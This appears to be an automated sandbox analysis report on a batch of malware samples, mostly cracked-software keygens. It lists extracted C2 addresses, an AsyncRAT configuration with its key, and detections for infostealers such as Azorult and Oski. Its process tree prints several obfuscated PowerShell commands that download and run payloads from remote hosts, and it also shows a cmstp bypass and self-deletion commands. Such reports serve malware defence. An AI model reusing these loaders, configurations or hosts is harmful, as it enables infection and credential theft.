Overview
overview
10Static
static
8ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
8ฺฺฺ�...�ฺ1m
windows10_x64
3ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
8ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
3ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
3ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
8ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
10ฺฺฺ�...�ฺ1m
windows10_x64
1ฺฺฺ�...�ฺ1m
windows10_x64
3Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
59s -
max time network
57s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 13:38
Static task
static1
Behavioral task
behavioral1
Sample
2019-09-02_22-41-10.bin.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
31.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3DMark 11 Advanced Edition.bin.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral6
Sample
DiskInternals_Uneraser_v5_keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
ForceOp 2.8.7 - By RaiSence.bin.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
HYDRA.bin.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
LtHv0O2KZDK4M637.bin.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
OnlineInstaller.bin.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral18
Sample
good.bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
infected dot net installer.bin.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
update.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
vir1.xls
Resource
win10v20201028
Behavioral task
behavioral22
Sample
xNet.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
VPN/VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
VPN/xNet.dll
Resource
win10v20201028
Behavioral task
behavioral26
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
General
Malware Config
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
azorult
http://195.245.112.115/index.php
Extracted
asyncrat
0.5.7B
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
AsyncMutex_6SI8OkPnk
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 4 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral9/memory/2112-244-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral9/memory/2112-245-0x000000000040616E-mapping.dmp disable_win_def behavioral9/memory/2324-252-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral9/memory/2324-253-0x0000000000403BEE-mapping.dmp disable_win_def -
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral9/memory/2920-233-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral9/memory/2920-234-0x000000000040C76E-mapping.dmp asyncrat -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 20 1492 powershell.exe 21 1996 powershell.exe 22 3172 powershell.exe 26 1996 powershell.exe 27 3172 powershell.exe 28 1492 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 21 IoCs
Processes:
Keygen.exexpj.exexbu.exegxd.exezVhjgfutyFD.exezVhjgfutyFD.exeHuytgfGDFwer.exegxd.exeHuytgfGDFwer.exezVhjgfutyFD.exezVhjgfutyFD.exeLxob3xFlxO.exe6jkGc1iBrs.exeCVLiRxRyTm.exequ5FSnorBt.exeLxob3xFlxO.exeLxob3xFlxO.exeCVLiRxRyTm.exeCVLiRxRyTm.exeCVLiRxRyTm.exequ5FSnorBt.exepid process 3848 Keygen.exe 5060 xpj.exe 5052 xbu.exe 5100 gxd.exe 4256 zVhjgfutyFD.exe 4460 zVhjgfutyFD.exe 4492 HuytgfGDFwer.exe 4576 gxd.exe 4704 HuytgfGDFwer.exe 4792 zVhjgfutyFD.exe 4760 zVhjgfutyFD.exe 4672 Lxob3xFlxO.exe 4916 6jkGc1iBrs.exe 3980 CVLiRxRyTm.exe 732 qu5FSnorBt.exe 4168 Lxob3xFlxO.exe 2920 Lxob3xFlxO.exe 296 CVLiRxRyTm.exe 3732 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2324 qu5FSnorBt.exe -
Loads dropped DLL 11 IoCs
Processes:
gxd.exeHuytgfGDFwer.exepid process 4576 gxd.exe 4704 HuytgfGDFwer.exe 4704 HuytgfGDFwer.exe 4704 HuytgfGDFwer.exe 4576 gxd.exe 4576 gxd.exe 4576 gxd.exe 4576 gxd.exe 4576 gxd.exe 4576 gxd.exe 4576 gxd.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
gxd.exedescription ioc process File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini gxd.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
gxd.exeHuytgfGDFwer.exezVhjgfutyFD.exezVhjgfutyFD.exeLxob3xFlxO.exeCVLiRxRyTm.exequ5FSnorBt.exedescription pid process target process PID 5100 set thread context of 4576 5100 gxd.exe gxd.exe PID 4492 set thread context of 4704 4492 HuytgfGDFwer.exe HuytgfGDFwer.exe PID 4460 set thread context of 4792 4460 zVhjgfutyFD.exe zVhjgfutyFD.exe PID 4256 set thread context of 4760 4256 zVhjgfutyFD.exe zVhjgfutyFD.exe PID 4672 set thread context of 2920 4672 Lxob3xFlxO.exe Lxob3xFlxO.exe PID 3980 set thread context of 2112 3980 CVLiRxRyTm.exe CVLiRxRyTm.exe PID 732 set thread context of 2324 732 qu5FSnorBt.exe qu5FSnorBt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
HuytgfGDFwer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HuytgfGDFwer.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 2176 timeout.exe 1520 timeout.exe 4248 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4928 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeLxob3xFlxO.exeCVLiRxRyTm.exeCVLiRxRyTm.exepid process 3172 powershell.exe 4056 powershell.exe 1952 powershell.exe 1996 powershell.exe 1492 powershell.exe 504 powershell.exe 1492 powershell.exe 1996 powershell.exe 1492 powershell.exe 1996 powershell.exe 3172 powershell.exe 3172 powershell.exe 4056 powershell.exe 4056 powershell.exe 504 powershell.exe 504 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 504 powershell.exe 3172 powershell.exe 4056 powershell.exe 1996 powershell.exe 1492 powershell.exe 4672 Lxob3xFlxO.exe 4672 Lxob3xFlxO.exe 3980 CVLiRxRyTm.exe 3980 CVLiRxRyTm.exe 3980 CVLiRxRyTm.exe 3980 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe 2112 CVLiRxRyTm.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
gxd.exeHuytgfGDFwer.exezVhjgfutyFD.exezVhjgfutyFD.exepid process 5100 gxd.exe 4492 HuytgfGDFwer.exe 4460 zVhjgfutyFD.exe 4256 zVhjgfutyFD.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exeLxob3xFlxO.exeCVLiRxRyTm.exequ5FSnorBt.exeCVLiRxRyTm.exedescription pid process Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 504 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 4928 taskkill.exe Token: SeDebugPrivilege 4672 Lxob3xFlxO.exe Token: SeDebugPrivilege 3980 CVLiRxRyTm.exe Token: SeDebugPrivilege 732 qu5FSnorBt.exe Token: SeDebugPrivilege 2112 CVLiRxRyTm.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
Keygen.exegxd.exexpj.exezVhjgfutyFD.exezVhjgfutyFD.exeHuytgfGDFwer.exepid process 3848 Keygen.exe 5100 gxd.exe 5060 xpj.exe 4256 zVhjgfutyFD.exe 4460 zVhjgfutyFD.exe 4492 HuytgfGDFwer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Keygen.bin.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exepowershell.exegxd.exexpj.exedescription pid process target process PID 640 wrote to memory of 3160 640 Keygen.bin.exe cmd.exe PID 640 wrote to memory of 3160 640 Keygen.bin.exe cmd.exe PID 640 wrote to memory of 3160 640 Keygen.bin.exe cmd.exe PID 3160 wrote to memory of 3848 3160 cmd.exe Keygen.exe PID 3160 wrote to memory of 3848 3160 cmd.exe Keygen.exe PID 3160 wrote to memory of 3848 3160 cmd.exe Keygen.exe PID 3160 wrote to memory of 2440 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 2440 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 2440 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 208 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 208 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 208 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 2176 3160 cmd.exe timeout.exe PID 3160 wrote to memory of 2176 3160 cmd.exe timeout.exe PID 3160 wrote to memory of 2176 3160 cmd.exe timeout.exe PID 3160 wrote to memory of 632 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 632 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 632 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 1244 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 1244 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 1244 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 1520 3160 cmd.exe timeout.exe PID 3160 wrote to memory of 1520 3160 cmd.exe timeout.exe PID 3160 wrote to memory of 1520 3160 cmd.exe timeout.exe PID 3160 wrote to memory of 3460 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 3460 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 3460 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 2304 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 2304 3160 cmd.exe mshta.exe PID 3160 wrote to memory of 2304 3160 cmd.exe mshta.exe PID 1244 wrote to memory of 504 1244 mshta.exe powershell.exe PID 1244 wrote to memory of 504 1244 mshta.exe powershell.exe PID 1244 wrote to memory of 504 1244 mshta.exe powershell.exe PID 2304 wrote to memory of 4056 2304 mshta.exe powershell.exe PID 2304 wrote to memory of 4056 2304 mshta.exe powershell.exe PID 2304 wrote to memory of 4056 2304 mshta.exe powershell.exe PID 632 wrote to memory of 3172 632 mshta.exe powershell.exe PID 632 wrote to memory of 3172 632 mshta.exe powershell.exe PID 632 wrote to memory of 3172 632 mshta.exe powershell.exe PID 2440 wrote to memory of 1996 2440 mshta.exe powershell.exe PID 2440 wrote to memory of 1996 2440 mshta.exe powershell.exe PID 2440 wrote to memory of 1996 2440 mshta.exe powershell.exe PID 3460 wrote to memory of 1492 3460 mshta.exe powershell.exe PID 3460 wrote to memory of 1492 3460 mshta.exe powershell.exe PID 3460 wrote to memory of 1492 3460 mshta.exe powershell.exe PID 208 wrote to memory of 1952 208 mshta.exe powershell.exe PID 208 wrote to memory of 1952 208 mshta.exe powershell.exe PID 208 wrote to memory of 1952 208 mshta.exe powershell.exe PID 3172 wrote to memory of 5052 3172 powershell.exe xbu.exe PID 3172 wrote to memory of 5052 3172 powershell.exe xbu.exe PID 3172 wrote to memory of 5052 3172 powershell.exe xbu.exe PID 1492 wrote to memory of 5060 1492 powershell.exe xpj.exe PID 1492 wrote to memory of 5060 1492 powershell.exe xpj.exe PID 1492 wrote to memory of 5060 1492 powershell.exe xpj.exe PID 1996 wrote to memory of 5100 1996 powershell.exe gxd.exe PID 1996 wrote to memory of 5100 1996 powershell.exe gxd.exe PID 1996 wrote to memory of 5100 1996 powershell.exe gxd.exe PID 5100 wrote to memory of 4256 5100 gxd.exe zVhjgfutyFD.exe PID 5100 wrote to memory of 4256 5100 gxd.exe zVhjgfutyFD.exe PID 5100 wrote to memory of 4256 5100 gxd.exe zVhjgfutyFD.exe PID 5060 wrote to memory of 4460 5060 xpj.exe zVhjgfutyFD.exe PID 5060 wrote to memory of 4460 5060 xpj.exe zVhjgfutyFD.exe PID 5060 wrote to memory of 4460 5060 xpj.exe zVhjgfutyFD.exe PID 5100 wrote to memory of 4492 5100 gxd.exe HuytgfGDFwer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3848 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Public\gxd.exe"C:\Users\Public\gxd.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4492 -
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4704 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\110807420359333\\* & exit8⤵PID:4892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 47049⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4928 -
C:\Users\Public\gxd.exe"C:\Users\Public\gxd.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4672 -
C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"8⤵
- Executes dropped EXE
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"8⤵
- Executes dropped EXE
PID:2920 -
C:\Users\Admin\AppData\Local\Temp\6jkGc1iBrs.exe"C:\Users\Admin\AppData\Local\Temp\6jkGc1iBrs.exe"7⤵
- Executes dropped EXE
PID:4916 -
C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"8⤵
- Executes dropped EXE
PID:296 -
C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"8⤵
- Executes dropped EXE
PID:3732 -
C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\i0goxk4y.inf9⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe"C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:732 -
C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe"C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe"8⤵
- Executes dropped EXE
PID:2324 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\gxd.exe"7⤵PID:3164
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:4248 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:2176 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172 -
